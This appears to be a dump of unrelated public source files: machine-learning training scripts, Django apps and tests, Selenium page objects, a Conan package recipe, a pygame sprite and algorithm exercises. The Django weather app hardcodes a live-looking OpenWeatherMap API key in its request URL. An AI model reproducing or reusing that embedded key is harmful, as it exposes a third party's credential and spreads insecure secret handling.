loss='categorical_crossentropy',\n metrics=['accuracy'])\n\n return model\n\n\ndef test_model(parameters, end_experiment_callback, verbose):\n \"\"\"Test one model: create, train, evaluate with test data and save\n results.\"\"\"\n # To make lines shorter\n p = parameters\n\n model = create_model(parameters)\n\n start = time.process_time()\n model.fit(train_images, train_labels, epochs=p.epochs,\n batch_size=p.batch_size,\n validation_data=(test_images, test_labels),\n verbose=verbose)\n training_time = time.process_time() - start\n\n start = time.process_time()\n test_loss, test_acc = model.evaluate(\n test_images, test_labels, verbose=verbose)\n\n test_time = time.process_time() - start\n\n end_experiment_callback(parameters, model, test_loss,\n test_acc, training_time, test_time)\n\n\ndef save_experiment(parameters, model, test_loss, test_acc,\n training_time, test_time):\n \"\"\"Save results from one experiment.\"\"\"\n # To save some typing\n p = parameters\n\n # Even though we have information about the optimizer in the parameters,\n # we read directly from the model as insurance against coding mistakes.\n optimizer = model.optimizer\n optimizer_name = type(optimizer).__name__\n\n experiments.loc[len(experiments)] = [\n p.experiment_name, datetime.now().strftime('%Y-%m-%d_%H:%M:%S'),\n 'MNIST', p.network, optimizer_name, test_loss, test_acc,\n p.hidden_layers, p.units_per_layer, p.epochs, p.batch_size,\n p.dropout_rate_input_layer, p.dropout_rate_hidden_layer,\n backend.eval(optimizer.lr), p.decay, p.sgd_momentum,\n p.max_norm_max_value, model.count_params(), training_time, test_time]\n\n # Show progress so far to the user\n print(experiments)\n\n # Save progress so far into the file used for this experiment\n results_file = p.experiment_name + '_results.txt'\n # First, get a formatted string; if we use to_string(header=False) it\n # will use only one space between columns, instead of formatting\n # considering the column name (the header).\n # Also ensure that we use a fixed-length size for the network name to\n # keep the columns aligned.\n output = StringIO()\n experiments.to_string(output, formatters={\n 
'Network': '{:>25}'.format}, header=True)\n if os.path.isfile(results_file):\n # File already exists - append data without column names.\n with open(results_file, 'a') as f:\n f.write(os.linesep)\n f.write(output.getvalue().splitlines()[1])\n output.close()\n else:\n # File doesn't exist yet - create and write column names + data\n with open(results_file, 'w') as f:\n f.write(output.getvalue())\n\n # Save training history and model for this specific experiment.\n # The model object must be a trained model, which means it has a `history`\n # object with the training results for each epoch.\n # We need to save the history separately because `model.save` won't save\n # it - it saves only the model data.\n\n # File where the training history and model will be saved. The name encodes\n # the test the parameters used in the epxeriment.\n base_name_template = ('{}_nw={}_opt={}_hl={:03d}_uhl={:04d}_e={:02d}'\n '_bs={:04d}_dri={:0.2f}_drh={:0.2f}_lr={:0.4f}'\n '_d={:0.4f}_m={}_mn={}')\n base_name = base_name_template.format(\n p.experiment_name, p.network, p.optimizer, p.hidden_layers,\n p.units_per_layer, p.epochs, p.batch_size,\n p.dropout_rate_input_layer, p.dropout_rate_hidden_layer,\n p.learning_rate, p.decay, p.sgd_momentum, p.max_norm_max_value,\n )\n\n with open(base_name + '_history.json', 'w') as f:\n json.dump(model.history.history, f)\n # Uncomment to save the model - it may take quite a bit of disk space\n # model.save(base_name + '_model.h5')\n\n\ndef parse_command_line():\n \"\"\"Parse command line parameters into a `Parameters` variable.\"\"\"\n ap = ArgumentParser(description='Dropout with MNIST data set.')\n\n ap.add_argument('--experiment_name', type=str)\n ap.add_argument('--network', type=str)\n ap.add_argument('--optimizer', type=str)\n ap.add_argument('--hidden_layers', type=int)\n ap.add_argument('--units_per_layer', type=int)\n ap.add_argument('--epochs', type=int)\n ap.add_argument('--batch_size', type=int)\n ap.add_argument('--dropout_rate_input_layer', type=float)\n ap.add_argument('--dropout_rate_hidden_layer', type=float)\n ap.add_argument('--learning_rate', type=float)\n ap.add_argument('--decay', type=float)\n ap.add_argument('--sgd_momentum', type=str)\n ap.add_argument('--max_norm_max_value', type=str)\n\n args = ap.parse_args()\n\n return Parameters(\n experiment_name=args.experiment_name,\n network=args.network,\n optimizer=args.optimizer,\n hidden_layers=args.hidden_layers,\n units_per_layer=args.units_per_layer,\n epochs=args.epochs,\n batch_size=args.batch_size,\n dropout_rate_input_layer=args.dropout_rate_input_layer,\n dropout_rate_hidden_layer=args.dropout_rate_hidden_layer,\n learning_rate=args.learning_rate,\n decay=args.decay,\n sgd_momentum=args.sgd_momentum,\n max_norm_max_value=args.max_norm_max_value,\n )\n\n\n# Store data from the experiments\nexperiments = pd.DataFrame(columns=[\n 'ExperimentName', 'TestTime', 'DataSetName', 'Network', 'Optimizer',\n 'TestLoss', 'TestAccuracy', 'HiddenLayers', 'UnitsPerLayer', 'Epochs',\n 'BatchSize', 'DropoutRateInput', 'DropoutRateHidden', 'LearningRate',\n 'Decay', 'SgdMomentum', 'MaxNorm', 'ModelParamCount', 'TrainingCpuTime',\n 'TestCpuTime'])\n\n\n# The input shape: pixels_per_image pixels images from MNIST data set\npixels_per_image = 28 * 28\n\n# Load and prepare data.\n# Note that they are global variables used in the functions above. 
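# (hedged aside on create_model above) the paper's n/p rule with Keras' drop-rate convention: the keep probability is 1 - dropout_rate, so a layer sized for n units without dropout grows to n / (1 - rate). Illustration:\nunits_per_layer, drop_rate = 512, 0.5\nadjusted = int(units_per_layer / (1 - drop_rate))\nassert adjusted == 1024  # matches units_hidden_layer for the script's default test parameters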
A future\n# improvement could be to add them to the parameters data structure.\nstart = time.process_time()\n(train_images, train_labels), (test_images, test_labels) = mnist.load_data()\ntrain_labels = to_categorical(train_labels)\ntest_labels = to_categorical(test_labels)\nprint('Timing: load and prepare data: {0:.5f}s'.format(\n time.process_time() - start))\n\ntrain_images = train_images.reshape((60000, pixels_per_image))\ntrain_images = train_images.astype('float32') / 255\ntest_images = test_images.reshape((10000, pixels_per_image))\ntest_images = test_images.astype('float32') / 255\n\np = parse_command_line()\n\nif all(param is None for param in p):\n # No command line parameter provided - running from within IDE. Build the\n # test configuration, warn the user and run in verbose mode.\n print('\\n\\n --- No command-line parameters - running with defaults\\n\\n')\n\n test_params = Parameters(\n experiment_name='dropout_mnist_mlp',\n network='dropout',\n optimizer='rmsprop',\n hidden_layers=4,\n units_per_layer=512,\n epochs=5,\n batch_size=128,\n dropout_rate_input_layer=0.1,\n dropout_rate_hidden_layer=0.5,\n learning_rate=0.001,\n decay=0.0,\n sgd_momentum='none',\n max_norm_max_value='none',\n )\n test_model(test_params, save_experiment, verbose=1)\nelse:\n # Running from the command line - use those parameters and reduce amount\n # of output from Keras to support nohup execution.\n test_model(p, save_experiment, verbose=2)\n","repo_name":"fau-masters-collected-works-cgarbin/dropout-vs-batch-normalization","sub_path":"mlp/dropout/CAP6619_term_project_mnist_mlp_dropout.py","file_name":"CAP6619_term_project_mnist_mlp_dropout.py","file_ext":"py","file_size_in_byte":10812,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"37"} +{"seq_id":"23694403295","text":"# %%\nimport os\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom keras.preprocessing.image import ImageDataGenerator\nfrom keras.layers import Conv2D,MaxPool2D,Dense,activation,Activation,Flatten\nfrom keras.optimizers import Adam\nimport matplotlib.pyplot as pyplot\n\ntrain_datagen = ImageDataGenerator(rescale=1/255.)\nvalid_datagen = ImageDataGenerator(rescale=1/255.)\n\ntrain_gen = train_datagen.flow_from_directory(\n '/home/satish/samples/vegetableDataset/Vegetable Images/train',\n target_size= (224,224),\n batch_size=32,\n class_mode ='categorical'\n)\n\n\n# %%\nvalid_gen = valid_datagen.flow_from_directory(\n '/home/satish/samples/vegetableDataset/Vegetable Images/validation',\n target_size=(224,224),\n batch_size=32,\n class_mode='categorical')\n\n\nmodel = keras.models.Sequential()\nmodel.add(Conv2D(32, (3,3),activation='relu',input_shape=(224,224,3)))\nmodel.add(MaxPool2D((2,2)))\nmodel.add(Conv2D(64, (3,3),activation='relu'))\nmodel.add(MaxPool2D((2,2)))\nmodel.add(Conv2D(128, (3,3),activation='relu'))\nmodel.add(MaxPool2D((2,2)))\nmodel.add(Flatten())\nmodel.add(Dense(256,activation='relu'))\nmodel.add(Dense(15,activation='softmax'))\n\nprint(model.summary())\n\n\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['acc'])\n\nhistory = model.fit(train_gen,epochs=10,steps_per_epoch=100,validation_data=valid_gen,validation_steps=15)\n\n\n#saving the model and weights to hdf5 file\nmodel.save('vegetable_model.hdf5')\n\n#saving the model in pb format for tfserving using tf.saved_model.save function...\n# need to create a folder to save all the details and the required format for the tfserving... 
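# (hedged aside, not in the original script) TF Serving expects each model under a numeric version subdirectory, which is why the export below targets 'vegetable_model/1/'; that directory will hold saved_model.pb plus a variables/ folder. A small helper to sanity-check the export after saving:\ndef check_export(path='vegetable_model/1/'):\n    reloaded = tf.saved_model.load(path)  # load the SavedModel back\n    assert 'serving_default' in reloaded.signatures\n    return reloaded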
\nos.makedirs('vegetable_model', exist_ok=True)\n\ntf.saved_model.save(model, 'vegetable_model/1/')\n\n# %%\n","repo_name":"satish-madugula/tf-serving","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28593552185","text":"from django.core.exceptions import ValidationError\nfrom parameterized import parameterized\n\nfrom .test_studies_base import StudiesBaseTest\n\n\nclass SubjectModelsTest(StudiesBaseTest):\n def setUp(self) -> None:\n self.subject = self.make_subject()\n return super().setUp()\n\n @parameterized.expand([\n ('name', 255),\n ('color', 8)\n ])\n def test_subject_fields_max_legth(self, field, max_length):\n setattr(self.subject, field, 'A' * (max_length + 1))\n with self.assertRaises(ValidationError):\n self.subject.full_clean()\n","repo_name":"Werberty/study-organizer","sub_path":"studies/tests/test_studies_model_subject.py","file_name":"test_studies_model_subject.py","file_ext":"py","file_size_in_byte":578,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"26455505220","text":"import json\nfrom django.core.management.base import BaseCommand\nfrom django.utils import timezone\nfrom product.models import Category, Product, PriceSource, SearchQuery, PriceHistory\nimport os\nimport requests\nfrom django.core.files import File\nimport time\nfrom django.db import transaction\n\n\ndef filter_invalid_prices(price_dict):\n \"\"\"\n Filters Invalid Prices\n \"\"\"\n filtered_dict = {key: value for key, value in price_dict.items() if value[0] is not None}\n return filtered_dict\n\nclass Command(BaseCommand):\n help = 'Adds scraped products to the database'\n\n def handle(self, *args, **options):\n json_file_path = os.path.abspath('./spyders/[ALL] - Listings.json')\n with open(json_file_path, 'r') as json_file:\n scraped_data = json.load(json_file)\n print(len(scraped_data))\n product_attributes = {}\n\n for i, j in scraped_data.items():\n for products in j:\n attributes_dict = {}\n for product_id, product_data in products.items():\n price = product_data[4]['price']\n name = product_data[1]['title']\n id = product_id\n product_url = product_data[12]['url']\n source_name = product_data[13]['source']\n description = \"{} - {}\".format(product_data[5]['city'], product_data[6]['sub_city'])\n category = product_data[3]['cat_name']\n main_cat = product_data[2]['main_cat']\n attrib_data = product_data[7]['attrs']\n for data_dict in attrib_data:\n for key, value in data_dict.items():\n attributes_dict[key] = value\n date_added = product_data[-2]['date_added']\n date_scraped = product_data[-1]['date_scraped']\n user_id = product_data[-7]['user_id']\n thumbnail_url = product_data[-5]['images']\n phone = product_data[-8]['phone']\n\n product_attributes[id] = [price, name, id, product_url, source_name, description, category, attributes_dict, date_added, date_scraped, user_id, thumbnail_url, phone, main_cat]\n\n filtered_product_attributes = filter_invalid_prices(product_attributes)\n prices = list()\n price_sources = {}\n new_price = list()\n price_change = list()\n\n price_types = []\n with transaction.atomic():\n for i, (j, k) in enumerate(filtered_product_attributes.items()):\n print(i, j)\n\n if k[-1] == \"Electronics\":\n\n category, created = Category.objects.get_or_create(name=k[6])\n\n price_source, created = PriceSource.objects.get_or_create(\n source_site=k[4],\n source_phone=k[-2],\n 
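# (hedged aside) filter_invalid_prices above keeps only entries whose first element, the price, is not None; a minimal check:\nsample = {'a': [None, 'x'], 'b': [10, 'y']}\nassert {k: v for k, v in sample.items() if v[0] is not None} == {'b': [10, 'y']}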
)\n\n try:\n products, created = Product.objects.get_or_create(\n id=k[2],\n name= k[1],\n location= k[5],\n product_url= k[3],\n date_added= timezone.datetime.fromisoformat(k[-6]),\n date_scraped=timezone.datetime.fromisoformat(k[-5]),\n category= category,\n attributes= k[7],\n thumbnail_url= k[-3],\n price_value=k[0],\n price_source=price_source)\n except Exception as e:\n print(\"In exception - {}\".format(e))\n price_histories, created = PriceHistory.objects.get_or_create(\n id=k[2],\n product=Product.objects.get(id=k[2]),\n price=k[0],\n \n ) \n","repo_name":"EskiasYilma/WisePenny","sub_path":"product/management/commands/add_jiji_data.py","file_name":"add_jiji_data.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"494979653","text":"import unittest\nimport tempfile\nimport os.path\n\nfrom PIL import Image\nfrom PIL import ImageChops\n\nfrom TwentyTwentiesHumorBot import ImageCaptioner\n\nclass ImageCaptionerTests(unittest.TestCase):\n\t\n\tdef setUp(self):\n\t\tself.captioner = ImageCaptioner(\"test_home\")\n\t\t# override defaults to a known value so the test doesn't break if defaults change later\n\t\tself.captioner.textColor = (255, 255, 255)\n\t\tself.captioner.textStrokeColor = (0, 0, 0)\n\t\tself.captioner.textPadding = 20\n\t\tself.captioner.startingFontSize = 12\n\t\tself.captioner.strokeDivisor = 20\n\t\t\n\t\tself.filename = \"pexels - 1170986 - EVG_Kowalievska - 'cat'.jpg\"\n\t\tself.expectedFilename = \"pexels - 1170986 - EVG_Kowalievska - 'cat' - captioned.jpg\"\n\t\n\tdef testOutputMatchesExpected(self):\n\t\t'''\n\t\tThis test runs the captioner on a known image and verifies that its results don't change on the next run.\n\t\tIf you even slightly change the algorithm this is likely to change (and break the test).\n\t\tThis is a little more ham-fisted of a way to test this class than I'd like, but testing image manipulation code is tough\n\t\tto do at a fine grained level because it's output is an image, not some discreet data I can run asserts on.\n\t\t'''\n\t\tif not os.path.exists(os.path.join(\"test_home\", \"font\")):\n\t\t\traise RuntimeError(\"Font file not accessible. 
The font is not legally redistributable, so it is not available in source control, so please provide one in the directory test_home/font\")\n\t\twith tempfile.TemporaryDirectory() as tempdir:\n\t\t\toutput = self.captioner.writeText(os.path.join(\"test_data\", self.filename), tempdir, \"test\")\n\t\t\tself.assertEqual(output, os.path.join(tempdir, self.filename))\n\t\t\tself.assertTrue(os.path.exists(os.path.join(tempdir, self.filename)))\n\t\t\tself.assertSameImage(os.path.join(tempdir, self.filename), os.path.join(\"test_data\", self.expectedFilename))\n\t\n\tdef assertSameImage(self, pathOne, pathTwo):\n\t\timage_one = Image.open(pathOne)\n\t\timage_two = Image.open(pathTwo)\n\n\t\tdiff = ImageChops.difference(image_one, image_two)\n\n\t\tif diff.getbbox():\n\t\t\traise AssertionError('images are different')","repo_name":"HelloLobsterDog/2020sHumorBot","sub_path":"tests/testImageCaptioner.py","file_name":"testImageCaptioner.py","file_ext":"py","file_size_in_byte":2075,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"11479115897","text":"from core import BasePage\nfrom selenium.webdriver.common.by import By\nfrom selenium.common.exceptions import InvalidArgumentException\nfrom selenium.common.exceptions import TimeoutException\nfrom pages.components.modals import Modals\nfrom api.api import ApiEu\nfrom api.api import ApiModels\nfrom pages.login_po import LoginPage\n\n\nclass EuHeader(BasePage):\n LOCATOR_EU_PAGE_TITLE = (By.XPATH, \"//div[@class='user-menu-page-title']\")\n LOCATOR_EU_USER_MENU = (By.XPATH, \"//div[contains(@class, 'user-menu ')]\")\n LOCATOR_EU_MENU_BUTTON = (By.XPATH, \"//fa-icon[contains(@class, 'menu-button')]\")\n LOCATOR_EU_SELECTED_PLAN_TEXT = (By.XPATH, \"//pkm-dropdown[contains(@class, 'plans-dropdown')]//div[contains(@class, 'dropdown')]\")\n LOCATOR_EU_PLAN_DROPDOWN = (By.XPATH, \"//pkm-dropdown[contains(@class, 'plans-dropdown')]//div[contains(@class, 'dropdown')]\")\n LOCATOR_EU_PLAN_DROPDOWN_VALUES = (By.XPATH, \"//div[contains(@class, 'dropdown-list')]//pkm-dropdown-item\")\n LOCATOR_EU_LOGOUT_BUTTON = (By.XPATH, \"//div[contains(@class, 'menu-item') and text()=' Выход ']\")\n\n def __init__(self, driver):\n BasePage.__init__(self, driver)\n self.login_page = LoginPage(driver)\n\n def get_title_text(self):\n text = self.get_element_text(self.LOCATOR_EU_PAGE_TITLE, time=15)\n return text\n\n def open_menu(self):\n self.find_and_click(self.LOCATOR_EU_MENU_BUTTON)\n assert self.find_element(self.LOCATOR_EU_USER_MENU, time=5), 'Невозможно открыть меню'\n\n def navigate_to_page(self, page_name):\n title = self.get_title_text()\n if title == page_name.upper():\n pass\n else:\n self.open_menu()\n button = (By.XPATH, f\"//div[contains(@class, 'menu-item ') and text() = ' {page_name} ']\")\n self.find_and_click(button)\n self.wait_until_text_in_element(self.LOCATOR_EU_PAGE_TITLE, page_name.upper())\n\n def logout(self):\n self.open_menu()\n self.find_and_click(self.LOCATOR_EU_LOGOUT_BUTTON)\n self.login_page.find_element(self.login_page.LOCATOR_PKM_LOGIN_EU_BUTTON)\n\n def get_plan_dropdown_placeholder(self):\n value = self.find_element(self.LOCATOR_EU_SELECTED_PLAN_TEXT)\n return value.text\n\n def expand_plan_dropdown(self):\n dropdown = self.find_element(self.LOCATOR_EU_PLAN_DROPDOWN)\n if 'focused' not in dropdown.get_attribute('class'):\n self.find_and_click(self.LOCATOR_EU_PLAN_DROPDOWN)\n\n def hide_plan_dropdown(self):\n dropdown = self.find_element(self.LOCATOR_EU_PLAN_DROPDOWN)\n if 'focused' 
in dropdown.get_attribute('class'):\n self.find_and_click(self.LOCATOR_EU_PLAN_DROPDOWN)\n\n def get_plan_dropdown_values(self):\n values = []\n self.expand_plan_dropdown()\n dropdown_values = self.driver.find_elements(*self.LOCATOR_EU_PLAN_DROPDOWN_VALUES)\n for value in dropdown_values:\n self.driver.execute_script(\"arguments[0].scrollIntoView();\", value)\n values.append(value.text)\n self.hide_plan_dropdown()\n return values\n\n def check_plan_dropdown_values(self):\n dropdown_values = self.get_plan_dropdown_values()\n api = self.api_creator.get_api_eu()\n plan_names = api.api_get_plans(names_only=True)\n assert self.compare_lists(dropdown_values, plan_names), 'В дропдауне версий отображаются не все планы'\n\n def select_plan(self, plan_uuid=None, plan_name=None):\n self.expand_plan_dropdown()\n if plan_uuid:\n value_locator = (By.XPATH, f\"(//div[contains(@class, 'dropdown-list')]//pkm-dropdown-item)[@test-plan-uuid='{plan_uuid}']\")\n value = self.find_element(value_locator)\n if plan_name:\n assert value.text == plan_name\n value.click()\n else:\n value_locator = (By.XPATH, f\"//div[@class='content' and contains(text(),' {plan_name} ')]/../..\")\n value = self.find_element(value_locator)\n if plan_uuid:\n assert value.get_attribute('test-plan-uuid') == plan_uuid\n value.click()\n if plan_name:\n assert self.get_plan_dropdown_placeholder() == plan_name\n\n\n\n\n\n\n\n\n","repo_name":"vmiloserdov1981/KS-auto-tests","sub_path":"pages/components/eu_header.py","file_name":"eu_header.py","file_ext":"py","file_size_in_byte":4282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17087276405","text":"class LFUCache:\n\n def __init__(self, capacity: int):\n self.d = {}\n self.f = defaultdict(dict)\n self.c = capacity\n self.m = 1\n \n def get(self, key: int) -> int:\n if key not in self.d: return -1\n x = self.d.pop(key)\n v = self.f[x].pop(key)\n if not self.f[x] and self.m == x:\n self.m += 1\n self.f[x+1][key] = v\n self.d[key] = x + 1\n return v\n \n def put(self, key: int, value: int) -> None:\n if self.c <= 0: return\n if key in self.d:\n self.get(key)\n self.f[self.d[key]][key] = value\n return\n \n if len(self.d) >= self.c:\n k = next(iter(self.f[self.m]))\n self.f[self.m].pop(k)\n self.d.pop(k)\n \n self.d[key] = 1\n self.f[1][key] = value\n self.m = 1\n# Your LFUCache object will be instantiated and called as such:\n# obj = LFUCache(capacity)\n# param_1 = obj.get(key)\n# obj.put(key,value)","repo_name":"mrprashantkumar/LeetCode-Submissions-Python","sub_path":"0460-lfu-cache/0460-lfu-cache.py","file_name":"0460-lfu-cache.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"73871222506","text":"from Game_Settings import *\r\n\r\n\r\nclass Player(pygame.sprite.Sprite):\r\n def __init__(self):\r\n pygame.sprite.Sprite.__init__(self)\r\n self.image = pygame.image.load(os.path.join(img_folder, \"Space_Invaders_Ship.png\")).convert()\r\n self.image.set_colorkey(black)\r\n self.rect = self.image.get_rect()\r\n self.rect.centerx = int(width / 2)\r\n self.rect.bottom = height - 25\r\n self.speedx = 0\r\n self.speedy = 0\r\n\r\n def update(self):\r\n self.speedx = 0\r\n self.speedy = 0\r\n keystate = pygame.key.get_pressed()\r\n if keystate[pygame.K_LEFT]:\r\n self.speedx = -1\r\n if keystate[pygame.K_RIGHT]:\r\n self.speedx = 1\r\n self.rect.x += self.speedx\r\n if self.rect.right > width:\r\n self.rect.right = width\r\n if 
self.rect.left < 0:\r\n self.rect.left = 0\r\n\r\n","repo_name":"jtbarwell/Space-Invaders","sub_path":"Player_Class.py","file_name":"Player_Class.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"35394213885","text":"from django.shortcuts import render, redirect\nfrom .models import City\nfrom .forms import CityForm\nimport requests\nimport datetime\n\ndef index(request) :\n url = 'http://api.openweathermap.org/data/2.5/weather?q={}&units=metric&appid=58f612f7fc0f3705abca1bc65ae1f855'\n error_msg = ''\n msg = ''\n msg_class = ''\n # city = 'India'\n\n if request.method == 'POST':\n form = CityForm(request.POST)\n if form.is_valid():\n new_city = form.cleaned_data['name']\n # existing_city_count = City.objects.filter(name = new_city).count()\n r = requests.get(url.format(new_city)).json()\n # print(\"Check \" + str(r))\n # getting validation for invalid city\n if r['cod'] == 200:\n form.save()\n else :\n error_msg = \"Invalid City\"\n # else :\n # error_msg = \"City Already Exists\"\n if error_msg :\n msg = error_msg\n # giving css style\n msg_class = \"danger\"\n else :\n # msg = \"City Added Successfully\"\n msg_class = \"success\"\n\n form = CityForm()\n\n cities = City.objects.all()\n count = cities.count()\n # print(\"Count is \" + str(count))\n\n if count == 0 :\n return render(request, 'weatherapp/clear.html', {'form' : form})\n else :\n # condition for valid city\n for city in cities :\n r = requests.get(url.format(city)).json()\n # print(r)\n\n date_time = datetime.datetime.now().strftime('%H:%M')\n # print(\"Time is\" + str(date_time))\n date = datetime.date.today()\n # print(\"Date is\" + str(date))\n\n city_weather = {\n 'city': city.name,\n 'temprature' : r['main']['temp'],\n 'description' : r['weather'][0]['description'],\n 'icon' : r['weather'][0]['icon'],\n 'presure' : r['main']['pressure'],\n 'humidity' : r['main']['humidity'],\n 'wind_speed' : r['wind']['speed'],\n 'date' : date,\n 'date_time' : date_time\n }\n\n print(city_weather)\n\n context = {\n 'city_weather' : city_weather,\n 'form' : form,\n 'msg' : msg,\n 'msg_class' : msg_class\n }\n\n return render(request, 'weatherapp/index.html', context)\n\n\ndef clear(request):\n # if user delete the cities\n url = 'http://api.openweathermap.org/data/2.5/weather?q={}&units=metric&appid=58f612f7fc0f3705abca1bc65ae1f855'\n\n if request.method == 'POST':\n form = CityForm(request.POST)\n if form.is_valid():\n new_city = form.cleaned_data['name']\n r = requests.get(url.format(new_city)).json()\n if r['cod'] == 200:\n form.save()\n\n return redirect('index')\n else :\n City.objects.all().delete()\n form = CityForm()\n context = {'form' : form }\n return render(request, 'weatherapp/clear.html', context)\n","repo_name":"Eugin-Paul/Weather-App","sub_path":"weather_project/weatherapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6873620691","text":"class Solution:\n def shortestPathLength(self, graph: List[List[int]]) -> int:\n n = len(graph)\n goal = (1 << n) - 1\n queue = collections.deque((x,1 << x) for x in range(n))\n steps = collections.defaultdict(lambda: n*n)\n for i in range(n): steps[i,1<<i]=0\n while queue:\n cn,cp=queue.popleft()\n cs=steps[cn,cp]\n if cp == goal: return cs\n for c in graph[cn]:\n chs= cp | ( 1 << c)\n if steps[c,chs]>cs+1:\n steps[c,chs]=cs+1\n 
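# (hedged aside on shortestPathLength above) the BFS state is the pair (current node, bitmask of visited nodes) and 'goal' is the full mask (1 << n) - 1, so the first state to reach it gives the answer. For n = 3:\nn = 3\ngoal = (1 << n) - 1                              # 0b111: every node visited\nstart_states = [(x, 1 << x) for x in range(n)]   # BFS starts from all nodes at once\nassert goal == 7 and start_states[1] == (1, 0b010)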
queue.append((c,chs))","repo_name":"akkinasrikar/leetcode-problems","sub_path":"847-shortest-path-visiting-all-nodes/847-shortest-path-visiting-all-nodes.py","file_name":"847-shortest-path-visiting-all-nodes.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1364156313","text":"from conans import ConanFile, CMake, tools\nfrom conans.errors import ConanInvalidConfiguration\nimport os\n\nrequired_conan_version = \">=1.33.0\"\n\n\nclass CspiceConan(ConanFile):\n name = \"cspice\"\n description = \"NASA C SPICE library\"\n license = \"TSPA\"\n topics = (\"spice\", \"naif\", \"kernels\", \"space\", \"nasa\", \"jpl\", \"spacecraft\", \"planet\", \"robotics\")\n homepage = \"https://naif.jpl.nasa.gov/naif/toolkit.html\"\n url = \"https://github.com/conan-io/conan-center-index\"\n\n settings = \"os\", \"arch\", \"compiler\", \"build_type\"\n options = {\n \"shared\": [True, False],\n \"fPIC\": [True, False],\n \"utilities\": [True, False],\n }\n default_options = {\n \"shared\": False,\n \"fPIC\": True,\n \"utilities\": True,\n }\n\n generators = \"cmake\"\n _cmake = None\n\n @property\n def _source_subfolder(self):\n return \"source_subfolder\"\n\n def export_sources(self):\n self.copy(\"CMakeLists.txt\")\n for patch in self.conan_data.get(\"patches\", {}).get(self.version, []):\n self.copy(patch[\"patch_file\"])\n\n def config_options(self):\n if self.settings.os == \"Windows\":\n del self.options.fPIC\n\n def configure(self):\n if self.options.shared:\n del self.options.fPIC\n del self.settings.compiler.libcxx\n del self.settings.compiler.cppstd\n\n def validate(self):\n sources_url_per_triplet = self.conan_data[\"sources\"][self.version][\"url\"]\n the_os = self._get_os_or_subsystem()\n if the_os not in sources_url_per_triplet:\n raise ConanInvalidConfiguration(\n \"cspice N{0} does not support {1}\".format(self.version, the_os)\n )\n compiler = str(self.settings.compiler)\n if compiler not in sources_url_per_triplet[the_os]:\n raise ConanInvalidConfiguration(\n \"cspice N{0} does not support {1} on {2}\".format(self.version, compiler, the_os)\n )\n arch = str(self.settings.arch)\n if arch not in sources_url_per_triplet[the_os][compiler]:\n raise ConanInvalidConfiguration(\n \"cspice N{0} does not support {1} on {2} {3}\".format(self.version, compiler, the_os, arch)\n )\n\n def _get_os_or_subsystem(self):\n if self.settings.os == \"Windows\" and self.settings.os.subsystem != \"None\":\n os_or_subsystem = str(self.settings.os.subsystem)\n else:\n os_or_subsystem = str(self.settings.os)\n return os_or_subsystem\n\n def source(self):\n pass\n\n def build(self):\n self._get_sources()\n for patch in self.conan_data.get(\"patches\", {}).get(self.version, []):\n tools.patch(**patch)\n cmake = self._configure_cmake()\n cmake.build()\n\n def _get_sources(self):\n the_os = self._get_os_or_subsystem()\n compiler = str(self.settings.compiler)\n arch = str(self.settings.arch)\n url = self.conan_data[\"sources\"][self.version][\"url\"][the_os][compiler][arch]\n sha256 = self.conan_data[\"sources\"][self.version][\"sha256\"][the_os][compiler][arch]\n if url.endswith(\".tar.Z\"): # Python doesn't have any module to uncompress .Z files\n filename = os.path.basename(url)\n tools.download(url, filename, sha256=sha256)\n command = \"zcat {} | tar -xf -\".format(filename)\n self.run(command=command)\n os.remove(filename)\n else:\n tools.get(url, sha256=sha256)\n tools.rename(self.name, 
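# (hedged aside on LFUCache above) its O(1) eviction leans on dicts preserving insertion order (guaranteed since Python 3.7): popping and re-inserting a key on every access keeps next(iter(...)) pointing at the least-recently used key within the minimum-frequency bucket. Minimal demonstration:\nd = {'a': 1, 'b': 2}\nd['a'] = d.pop('a')          # touch 'a' -> it moves to the end\nassert next(iter(d)) == 'b'  # 'b' is now the eviction candidate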
self._source_subfolder)\n\n def _configure_cmake(self):\n if self._cmake:\n return self._cmake\n self._cmake = CMake(self)\n self._cmake.definitions[\"BUILD_UTILITIES\"] = self.options.utilities\n self._cmake.configure()\n return self._cmake\n\n def package(self):\n tools.save(os.path.join(self.package_folder, \"licenses\", \"LICENSE\"), self._extract_license())\n cmake = self._configure_cmake()\n cmake.install()\n\n def _extract_license(self):\n spiceusr_header = tools.load(os.path.join(self._source_subfolder, \"include\", \"SpiceUsr.h\"))\n begin = spiceusr_header.find(\"-Disclaimer\")\n end = spiceusr_header.find(\"-Required_Reading\", begin)\n return spiceusr_header[begin:end]\n\n def package_info(self):\n self.cpp_info.libs = [\"cspice\"]\n if self.settings.os == \"Linux\":\n self.cpp_info.system_libs.append(\"m\")\n\n if self.options.utilities:\n bin_path = os.path.join(self.package_folder, \"bin\")\n self.output.info(\"Appending PATH environment variable: {}\".format(bin_path))\n self.env_info.PATH.append(bin_path)\n","repo_name":"SpaceIm/conan-cspice","sub_path":"conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":4678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25655310983","text":"from django.urls import path\nfrom .views import PostList, PostDetail, PostSearch, PostUpdateView, PostDeleteView, PostCreate, ArticleList, \\\n UserUpdateView, GradientView, 